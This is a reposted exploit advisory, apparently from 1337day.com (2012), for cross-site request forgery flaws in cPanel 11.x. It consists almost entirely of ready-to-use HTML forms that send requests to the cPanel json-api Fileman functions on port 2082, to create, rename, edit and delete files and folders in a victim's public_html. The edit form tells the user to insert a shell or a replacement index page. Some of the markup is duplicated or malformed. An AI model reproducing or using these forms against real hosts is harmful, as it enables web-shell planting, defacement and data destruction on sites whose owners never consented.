Bài liên quan
Cpanel 11.X Multiple CSRF Vulnerability ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://www.cpanel.net/ .:. Gr34T$ T0 [aboud-el] #################################################################### ===[ Exploit ]=== Add File ======== <form method="POST" name="form0" action="http://IP:2082/json-api/cpanel"> <input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/> <input type="hidden" name="cpanel_jsonapi_func" value="mkfile"/> <input type="hidden" name="path" value="/public_html"/> <input type="hidden" name="name" value="Palestine.php"/> </form> </body> </html> <input type="hidden" name="name" value="Palestine.php"/> Ur File Name Rename File =========== <form method="POST" name="form0" action="http://IP:2082/json-api/cpanel"> <input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/> <input type="hidden" name="cpanel_jsonapi_func" value="fileop"/> <input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/> <input type="hidden" name="filelist" value="1"/> <input type="hidden" name="multiform" value="1"/> <input type="hidden" name="doubledecode" value="0"/> <input type="hidden" name="op" value="rename"/> <input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/> <input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/> <input type="hidden" name="destfiles" value="Test.php"/> </body> </html> <input type="hidden" name="destfiles" value="Test.php"/> New Name Edit File ========= <form method="POST" name="form0" action="http://IP:2082/json-api/cpanel"> <input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/> <input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/> <input type="hidden" name="cpanel_jsonapi_func" value="savefile"/> <input type="hidden" name="dir" value="/home/User/public_html"/> <input type="hidden" name="filename" value="Palestine.php"/> <input type="hidden" name="content" value="Ur Code (Shell Or Index)"/> <input type="hidden" name="utf8_fallback" value="1"/> <input type="hidden" name="charset" value="utf-8"/> </form> </body> </html> Delete File ============ <form method="POST" name="form0" action="http://IP:2082/json-api/cpanel"> <input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/> <input type="hidden" name="cpanel_jsonapi_func" value="fileop"/> <input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/> <input type="hidden" name="filelist" value="1"/> <input type="hidden" name="multiform" value="1"/> <input type="hidden" name="doubledecode" value="0"/> <input type="hidden" name="op" value="unlink"/> <input type="hidden" name="metadata" value="undefined"/> <input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/> </form> </body> </html> <input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine.php"/> File Name Delete Add Folder =========== <form method="POST" name="form0" action="http://IP:2082/json-api/cpanel"> <input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/> <input type="hidden" name="cpanel_jsonapi_func" value="mkdir"/> <input type="hidden" name="path" value="/public_html"/> <input type="hidden" name="name" value="Palestine"/> </form> </body> </html> <input type="hidden" name="name" value="Palestine"/> Ur Folder Name Rename Folder ============= <form method="POST" name="form0" action="http://IP:2082/json-api/cpanel"> <input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/> <input type="hidden" name="cpanel_jsonapi_func" value="fileop"/> <input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/> <input type="hidden" name="filelist" value="1"/> <input type="hidden" name="multiform" value="1"/> <input type="hidden" name="doubledecode" value="0"/> <input type="hidden" name="op" value="rename"/> <input type="hidden" name="metadata" value="[object HTMLTableRowElement]"/> <input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/> <input type="hidden" name="destfiles" value="Test"/> </form> </body> </html> <input type="hidden" name="destfiles" value="Test"/> New Name Delete Folder ============= <form method="POST" name="form0" action="http://IP:2082/json-api/cpanel"> <input type="hidden" name="cpanel_jsonapi_module" value="Fileman"/> <input type="hidden" name="cpanel_jsonapi_func" value="fileop"/> <input type="hidden" name="cpanel_jsonapi_apiversion" value="2"/> <input type="hidden" name="filelist" value="1"/> <input type="hidden" name="multiform" value="1"/> <input type="hidden" name="doubledecode" value="0"/> <input type="hidden" name="op" value="unlink"/> <input type="hidden" name="metadata" value="undefined"/> <input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/> </form> </body> </html> <input type="hidden" name="sourcefiles" value="/home/User/public_html/Palestine"/> Folder Name Delete #################################################################### # 1337day.com [2012-05-26]
Post a Comment